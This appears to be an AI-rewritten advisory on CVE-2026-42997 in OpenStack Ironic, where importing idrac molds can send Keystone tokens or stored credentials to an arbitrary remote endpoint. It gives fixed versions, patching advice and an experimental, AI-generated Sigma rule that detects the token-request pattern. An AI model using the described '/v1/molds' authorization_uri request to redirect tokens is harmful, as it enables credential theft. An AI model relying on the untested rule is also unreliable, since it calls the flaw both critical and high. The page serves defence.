OpenStack Ironic Vulnerability CVE-2026-42997 Exposes Keystone Tokens

/HIGH /CVSS 7.7/10
Written by SCW Vulnerability Desk Vulnerability Intelligence
SCW vulnerabilitycvehigh-severitycwe-669
OpenStack Ironic Vulnerability CVE-2026-42997 Exposes Keystone Tokens

A critical vulnerability, CVE-2026-42997, has been identified in OpenStack Ironic, specifically affecting versions prior to 35.0.1. According to the National Vulnerability Database, this flaw allows a malicious user, during the import process, to exploit idrac molds to request authorization tokens be sent to an arbitrary remote endpoint. The credentials forwarded are either a time-limited Keystone token, granting broad access to all OpenStack services Ironic is authorized for, or basic credentials configured for mold storage.

This is a serious issue. The National Vulnerability Database assigns it a CVSS score of 7.7 (HIGH), with a vector of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N. It’s a network-exploitable vulnerability requiring low privileges but leading to high confidentiality impact. Attackers can effectively siphon off powerful, time-limited Keystone tokens, which can then be used to pivot deeper into the OpenStack environment. The fixed versions are 26.1.6, 29.0.5, 32.0.1, and 35.0.1.

For defenders, this means a directly exposed attack surface within Ironic’s import functionality. An attacker who gains even low-level access to the OpenStack environment could leverage this to elevate privileges and access other services. The core risk is the exfiltration of a Keystone token, which acts as a golden ticket for further compromise. Patching is non-negotiable.

What This Means For You

  • If your organization uses OpenStack Ironic, you need to immediately verify your version. If it's prior to 26.1.6, 29.0.5, 32.0.1, or 35.0.1, you are vulnerable to **CVE-2026-42997**. Prioritize patching to one of the fixed versions to prevent unauthorized exfiltration of Keystone tokens and subsequent privilege escalation within your OpenStack environment. Audit your Ironic import logs for suspicious activity.

Related ATT&CK Techniques

T1190 Exploit Public-Facing Application Initial Access T1552.001 Credentials In Files Credential Access

🛡️ Detection Rules

2 rules · 6 SIEM formats

2 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.

high T1190 Initial Access

CVE-2026-42997 - OpenStack Ironic Molds Remote Token Request

Sigma YAML — free preview 
title: CVE-2026-42997 - OpenStack Ironic Molds Remote Token Request
id: scw-2026-05-05-ai-1
status: experimental
level: high
description: |
  This rule detects the specific pattern of a POST request to the '/v1/molds' endpoint with an 'authorization_uri' parameter, which is indicative of the vulnerability in OpenStack Ironic (CVE-2026-42997) where a user can request authorization to be sent to a remote endpoint, potentially exposing Keystone tokens.
author: SCW Feed Engine (AI-generated)
date: 2026-05-05
references:
  - https://shimiscyberworld.com/posts/nvd-CVE-2026-42997/
tags:
  - attack.initial_access
  - attack.t1190
logsource:
    category: webserver
detection:
  selection:
      cs-uri|contains:
          - '/v1/molds'
      cs-method:
          - 'POST'
      cs-uri-query|contains:
          - 'authorization_uri='
  condition: selection
falsepositives:
  - Legitimate administrative activity

Source: Shimi's Cyber World · License & reuse

✓ Sigma · Splunk SPL Sentinel KQL Elastic QRadar AQL Wazuh Get rules for your SIEM →

Indicators of Compromise

IDTypeIndicator
CVE-2026-42997 Information Disclosure OpenStack Ironic before 35.0.1
CVE-2026-42997 Information Disclosure OpenStack Ironic 26.x before 26.1.6
CVE-2026-42997 Information Disclosure OpenStack Ironic 29.x before 29.0.5
CVE-2026-42997 Information Disclosure OpenStack Ironic 32.x before 32.0.1
CVE-2026-42997 Information Disclosure idrac component in OpenStack Ironic

Written by SCW Vulnerability Desk

Source & Attribution
Source PlatformNVD
ChannelNational Vulnerability Database
PublishedMay 05, 2026 at 22:16 UTC

This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.

Believe this infringes your rights? Submit a takedown request.

Related coverage

D-Link DI-8100 Router Vulnerable to Remote Buffer Overflow (CVE-2026-7857)

CVE-2026-7857 — A vulnerability has been found in D-Link DI-8100 16.07.26A1. This vulnerability affects the function sprintf of the file /user_group.asp of the component CGI...

vulnerabilityCVEhigh-severitybuffer-overflowcwe-119cwe-120
/SCW Vulnerability Desk /HIGH /7.2 /⚑ 1 IOC /⚙ 5 Sigma

D-Link DI-8100 Buffer Overflow (CVE-2026-7856) Exposes Web Management

CVE-2026-7856 — A flaw has been found in D-Link DI-8100 16.07.26A1. This affects an unknown part of the file /url_member.asp of the component Web Management...

vulnerabilityCVEhigh-severitybuffer-overflowcwe-119cwe-120
/SCW Vulnerability Desk /HIGH /7.2 /⚑ 4 IOCs /⚙ 1 Sigma

ProFTPD SQL Injection (CVE-2026-44331) Exposes Servers to Remote Attacks

CVE-2026-44331 — In ProFTPD through 1.3.9a before 7666224, a SQL injection vulnerability in sqltab_fetch_clients_cb() in contrib/mod_wrap2_sql.c allows a remote attacker to inject arbitrary SQL commands...

vulnerabilityCVEhigh-severitysql-injectioncwe-89
/SCW Vulnerability Desk /HIGH /8.1 /⚑ 3 IOCs /⚙ 3 Sigma